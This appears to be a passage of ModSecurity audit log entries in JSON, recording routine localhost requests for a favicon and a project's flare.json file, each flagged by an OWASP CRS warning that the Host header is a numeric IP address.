{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuEEAAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcASX8AAQEAAAkYuEEAAAAD\"]"],"stopwatch":{"p1":539,"p2":1209,"p3":65,"p4":390,"p5":93,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:47:05 --0400","transaction_id":"WRcASX8AAQEAAAkYuEIAAAAD","remote_address":"127.0.0.1","remote_port":41700,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcASX8AAQEAAAkYuEIAAAAD\"]"],"stopwatch":{"p1":416,"p2":979,"p3":45,"p4":269,"p5":48,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:50:15 --0400","transaction_id":"WRcBB38AAQEAAAkZ0AgAAAAE","remote_address":"127.0.0.1","remote_port":41708,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 12:47:03 GMT","If-None-Match":"\"107-54f6738077c82\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 12:50:12 GMT","ETag":"\"107-54f674343ea58\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcBB38AAQEAAAkZ0AgAAAAE\"]"],"stopwatch":{"p1":916,"p2":1838,"p3":115,"p4":232,"p5":78,"sr":47,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:50:15 --0400","transaction_id":"WRcBB38AAQEAAAkZ0AkAAAAE","remote_address":"127.0.0.1","remote_port":41708,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcBB38AAQEAAAkZ0AkAAAAE\"]"],"stopwatch":{"p1":455,"p2":893,"p3":45,"p4":372,"p5":51,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:08:50:15 --0400","transaction_id":"WRcBB38AAQEAAAkZ0AoAAAAE","remote_address":"127.0.0.1","remote_port":41708,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcBB38AAQEAAAkZ0AoAAAAE\"]"],"stopwatch":{"p1":491,"p2":964,"p3":63,"p4":526,"p5":126,"sr":22,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:11:58 --0400","transaction_id":"WRcGHn8AAQEAAAkVV4AAAAAA","remote_address":"127.0.0.1","remote_port":41714,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 12:50:12 GMT","If-None-Match":"\"107-54f674343ea58\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:11:55 GMT","ETag":"\"53a-54f6790ec94c7\"","Accept-Ranges":"bytes","Content-Length":"1338","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcGHn8AAQEAAAkVV4AAAAAA\"]"],"stopwatch":{"p1":783,"p2":1629,"p3":61,"p4":258,"p5":53,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:11:59 --0400","transaction_id":"WRcGH38AAQEAAAkVV4EAAAAA","remote_address":"127.0.0.1","remote_port":41714,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcGH38AAQEAAAkVV4EAAAAA\"]"],"stopwatch":{"p1":722,"p2":1021,"p3":76,"p4":376,"p5":48,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:11:59 --0400","transaction_id":"WRcGH38AAQEAAAkVV4IAAAAA","remote_address":"127.0.0.1","remote_port":41714,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcGH38AAQEAAAkVV4IAAAAA\"]"],"stopwatch":{"p1":642,"p2":1666,"p3":90,"p4":450,"p5":183,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:18:37 --0400","transaction_id":"WRcHrX8AAQEAAAmHBIkAAAAF","remote_address":"127.0.0.1","remote_port":41732,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:11:55 GMT","If-None-Match":"\"53a-54f6790ec94c7\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 13:18:34 GMT","ETag":"\"65-54f67a8b8202b\"","Accept-Ranges":"bytes","Content-Length":"101","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcHrX8AAQEAAAmHBIkAAAAF\"]"],"stopwatch":{"p1":900,"p2":1595,"p3":64,"p4":228,"p5":55,"sr":36,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:18:37 --0400","transaction_id":"WRcHrX8AAQEAAAmHBIoAAAAF","remote_address":"127.0.0.1","remote_port":41732,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy 